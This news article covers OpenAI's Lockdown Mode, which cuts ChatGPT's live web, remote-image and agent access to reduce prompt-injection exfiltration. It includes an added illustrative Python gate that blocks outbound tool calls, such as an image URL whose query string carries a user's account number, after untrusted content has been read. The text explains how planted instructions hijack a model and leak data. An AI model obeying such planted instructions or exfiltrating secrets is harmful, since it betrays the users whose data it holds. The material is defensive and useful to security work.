OpenAI Launches Lockdown Mode to Curb Prompt-Injection Risks in ChatGPT
Lockdown Mode disables several of ChatGPT’s most powerful external‑data features. When the setting is enabled, the model can no longer browse the live web, retrieve images from the internet, or use the deep‑research or agent modes that allow it to pull in real‑time information. Users can still generate images with the built‑in image‑generation engine, but the model will rely only on its internal knowledge base and any content the user explicitly uploads.
The company cautions that Lockdown Mode does not eliminate all prompt‑injection vulnerabilities. OpenAI said that malicious instructions could still appear in cached web content or in uploaded files and could influence the model’s responses. The goal, it explained, is to limit the amount of data that could be exfiltrated during an attack.
Lockdown Mode is not intended for all users. OpenAI stated that it is aimed at “people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.” The feature is currently being made available to self‑serve ChatGPT Business accounts and to a subset of eligible personal accounts.
Prompt injection is a known security concern for large language models. The attack vector involves embedding malicious instructions in user‑supplied text or in content that the model retrieves from external sources. Because models like GPT are designed to follow the instructions they receive, they can be tricked into executing unintended commands. When web browsing or file‑upload capabilities are enabled, the model must distinguish between developer instructions, user input, and third‑party content—a distinction that is difficult to enforce.
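The trade-off described above, sketched as an added example (not OpenAI's implementation and not code from the article): a gate in front of model-requested tool calls that tracks where each piece of context came from and either filters outbound requests or, in lockdown, removes the outbound channel entirely. The tool names, the `gate` and `leaked_values` functions and the sample conversation are all hypothetical and constructed for illustration.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit, parse_qsl

# Hypothetical tool names modelled on the features the article lists.
NETWORK_TOOLS = {"web_browse", "fetch_remote_image", "deep_research", "agent_mode"}
LOCAL_TOOLS = {"generate_image", "read_uploaded_file"}

@dataclass
class Message:
    source: str  # "developer", "user" or "third_party"
    text: str

@dataclass
class ToolCall:
    name: str
    argument: str  # URL for network tools, prompt or file name for local ones

def leaked_values(url, secrets):
    """Secrets that appear verbatim in the path or query of an outbound URL."""
    parts = urlsplit(url)
    haystack = [parts.path] + [value for _, value in parse_qsl(parts.query)]
    return [s for s in secrets if any(s in h for h in haystack)]

def gate(call, context, secrets, lockdown):
    """Return (allowed, reason) for a tool call the model has requested."""
    if call.name in LOCAL_TOOLS:
        return True, "local tool"
    if call.name not in NETWORK_TOOLS:
        return False, "unknown tool"
    if lockdown:
        # The channel is removed outright, so nothing depends on spotting the leak.
        return False, "lockdown: outbound tools disabled"
    untrusted = any(m.source == "third_party" for m in context)
    if untrusted and leaked_values(call.argument, secrets):
        # Heuristic: verbatim matching misses encoded or split values.
        return False, "secret in outbound URL after third-party content"
    return True, "allowed"

# Constructed sample conversation; the account number is made up.
SECRETS = ["ACCT-0000-EXAMPLE"]
CONTEXT = [
    Message("developer", "Answer questions about uploaded documents."),
    Message("user", "Summarise report.pdf. My account is ACCT-0000-EXAMPLE."),
    Message("third_party", "[report text containing a planted instruction]"),
]
LEAKY = ToolCall("fetch_remote_image", "https://images.example/p.png?id=ACCT-0000-EXAMPLE")
BENIGN = ToolCall("web_browse", "https://docs.example/pricing")
UPLOAD = ToolCall("read_uploaded_file", "report.pdf")
```

Under lockdown the uploaded file is still read, so planted instructions can still reach the model; what changes is that no outbound tool is left to carry data out.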
OpenAI’s move follows a broader industry focus on AI safety and data privacy. The company has previously introduced other safeguards, such as elevated risk labels that flag potentially harmful content. The new Lockdown Mode adds an infrastructure‑level restriction that limits the model’s ability to access external data streams.
The rollout is gradual. According to OpenAI’s public statements, the feature is first being offered to ChatGPT Business customers who pay for the premium tier, and then to a limited number of personal users who meet certain eligibility criteria. The company has not yet announced a timeline for full availability.
Industry observers note that Lockdown Mode could become a standard requirement for enterprises that use ChatGPT for internal workflows. By restricting external data access, organizations can reduce the risk that confidential information is inadvertently shared with the model or that attackers can harvest data through the model’s outputs.
OpenAI’s announcement comes at a time when the company is under scrutiny for its handling of data privacy and for past legal challenges related to copyright and model training data. The new feature is part of a broader effort to address security concerns that have grown as ChatGPT’s user base expanded to over 900 million weekly active users by early 2026.
At present, Lockdown Mode is a voluntary setting that users can enable or disable. The company has not indicated that it will enforce the feature for all customers. It remains to be seen how the broader AI community will respond and whether other vendors will adopt similar restrictions.
In the coming months, analysts will watch how Lockdown Mode affects user experience and whether it mitigates the risk of prompt‑injection attacks in practice. OpenAI has not released metrics on the feature’s effectiveness, and no independent audit has yet been published.
The next major update for ChatGPT is expected in the third quarter of 2026, when the company plans to introduce additional safety layers and an expanded set of compliance tools for enterprise customers. Until then, Lockdown Mode represents the latest step in OpenAI’s ongoing effort to balance functionality with security.